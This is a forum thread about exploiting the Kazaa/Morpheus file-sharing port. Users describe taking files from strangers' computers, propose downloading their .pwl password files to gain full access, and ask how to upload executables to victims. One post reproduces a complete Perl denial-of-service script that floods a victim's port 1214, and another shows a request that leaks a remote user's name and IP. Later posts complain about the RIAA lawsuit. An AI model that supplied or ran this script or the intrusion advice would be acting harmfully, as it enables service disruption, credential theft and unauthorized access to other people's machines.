morpheus/kazaa question
Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: morpheus/kazaa question

  1. #1

    morpheus/kazaa question

    Ok, I've investigated the morpheus/kazaa deal. (i use morpheus) I've leeched files by doing this. But, is there a way I can upload files (txt. and exe.) into there computer this way?? Also is leeching files the only benefit of this exploit?
    Share on Google+

  2. #2
    Member
    Join Date
    Dec 2001
    Posts
    75

    Thumbs up yes...

    yea you can only d/l files from them using this but, u can d/l there passwd or .plw file and get full access to there computer and do like that...




    -Guerrilla Se7en
    Share on Google+

  3. #3
    Junior Member
    Join Date
    Dec 2001
    Posts
    13
    wait wait.. they would have had to share their whole HD to download a .pwl right? or am I missing something?

    Anyway, has anyone found a way to maybe.. overload port 1214.. a buffer exploit maybe? (That port number is from memory that may be the wrong one.. )

    ~DW~
    Share on Google+

  4. #4
    Member
    Join Date
    Dec 2001
    Posts
    75

    Post not yet....

    i really havn't looked to much after i found the flaw... i just made the tut and ened my reserch but i need to see if i can't find a way to do this.... ( http://www.angelfire.com/linux/antiw..._and_kazaa.txt )




    -Guerrilla Se7en
    Share on Google+

  5. #5
    Member
    Join Date
    Oct 2001
    Posts
    31

    Question

    yeah i tried it, everytime i tried to connect to the 1214 port to view all their files i just got a page not found error..

    also , i thought .pwl files where written in hex? i tried to open one with word pad and note pad but it just looked like unreadable jargon stuff ...
    Share on Google+

  6. #6
    Banned
    Join Date
    Oct 2001
    Posts
    1,463

    Post

    I found this DoS attack against KazaA/Morpheus at http://www.securityteam.com

    Problem: Both Kazaa and Morpheus file sharing applications has a port
    which allow anonymous file access to their shared folder. What does this have
    to do with Denial of Service? Unlike connections made from other users
    of the applications, the number of connections to the port cannot be
    regulated or detected by the client. This obviously will allow us to flood the
    server with requests and therefore use up all of the available bandwidth.
    Also due to the fact that most users have setup their firewall privileges so
    that Kazaa or Morpheus is allowed access to open connections to outside sources
    his attack will bypass most personal firewall clients.


    #!/usr/bin/perl
    #
    #Kazaa/Morpheus Denial of Service Attack
    #
    #Usage: ./km.pl -h victimip

    use Socket;
    use Getopt::Std;

    getopts("h:", \%args);

    print("\nK/M Denial of Service\n");
    if (!defined $args{h}) {
    print("Usage: km.pl -h victimip\n\n");
    exit; }

    $host = $args{h};
    $target = inet_aton($host) || die("inet_aton problems; host doesn't exist?");

    $trash="A"x100;

    &exec_cmd($command);

    sub exec_cmd {
    for($count=1;$count<=1000;$count++)
    {
    sendraw("GET /\"$trash\" HTTP/1.0\n\n");
    print("|");
    }
    print("\nData Sent.\n\n");
    }

    sub sendraw {
    my ($pstr)=@_;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
    die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,1214,$target)){
    my @in;
    select(S); $|=1; print $pstr;
    while(< S >){ push @in, $_;
    print STDOUT "." if(defined $args{X});}
    select(STDOUT); close(S); return @in;
    } else { die("Can't connect...\n"); }
    }

    Share on Google+

  7. #7
    Banned
    Join Date
    Oct 2001
    Posts
    1,463
    NewOrder [http://neworder.box.sk/showme.php3?id=5574]
    Summary
    Kazaa and Morpheus allow users to easily search, share, discover, create, and communicate with other users. These products reveal sensitive information about the remote host, and the username that is currently being used by the remote client.


    Details
    Example:
    # telnet morpheus.users.ip.address
    Trying morpheus.users.ip.address...
    Connected to morpheus.users.ip.address.
    Escape character is '^]'.
    GET / HTTP/1.0

    HTTP/1.0 200 OK
    X-Kazaa-Username: {USER NAME HERE}
    X-Kazaa-Network: MusicCity
    X-Kazaa-IP: morpheus.users.ip.address:1214
    X-Kazaa-SupernodeIP: 130.74.237.54:1214
    Share on Google+

  8. #8
    Member
    Join Date
    Aug 2001
    Posts
    68

    Question hmmmm

    has anyone found a way to stop these exploits?????
    Life is like a **** sandwich,
    The more bread u have the less **** u have to eat
    Share on Google+

  9. #9
    Banned
    Join Date
    Oct 2001
    Posts
    1,463
    Nope....not yet...
    I dont think there gunna make a patch... KazaA/Morpheus is shutting down soon
    They got sued by the RIAA....
    Top recording companies and motion picture studios have launched a post-Napster strike on digital music and video swapping with a lawsuit targeting peer-to-peer network technology known as FastTrack, but more familiar to Internet users under such names as Kazaa, Morpheus and Grokster.

    I just have 1 question about this.... KazaA/Morpheus dont use servers..... Each user is their own node on the network.. So how can they shut it down ?

    The full story can be found here
    Share on Google+

  10. #10
    PHP/PostgreSQL guy
    Join Date
    Dec 2001
    Posts
    1,164
    *sigh* Notice, it's the RIAA that's doing the suing...why? Because they're the ones losing out. The bands make **** compared to what the RIAA makes for each CD, tape, etc sold. You might get 2 bucks for each CD sold that your band made, but the RIAA gets say, 10? 500% profit, must be nice. **** them I say...they've been making gazillions of bucks yearly off of this and now, with p2p sharing and other methods putting out songs for free. The RIAA is afraid and so are these one-hit wonders that sell one cd single, make money, then bail.

    I'd suggest going to audiogalaxy and get on the pay servers, which costs oh...4 bucks a month or something like that. That's more than reasonable for songs you can download.

    Personally, the RIAA disgusts me. It's like the postal service saying they wanted to charge for each email sent because they're losing business. Yeah right bitches...tell it like it really is. If you're losing business then why're you having to jack the price of the stamp every year up 1 cent? Just make it .50 per stamp and leave me the fsck alone...

    Somewhere, there's a survey showing that there was an increase in the sales of CDs after all this p2p because people could hear songs that they otherwise would never listen to. Prime case in point: me listening to an mp3 off of Audiogalaxy from Linkin Park called 'Part of me'...loved the song, so I went out and bought their cd, Hybrid Theory. Excellent CD.
    We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.
    Share on Google+

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides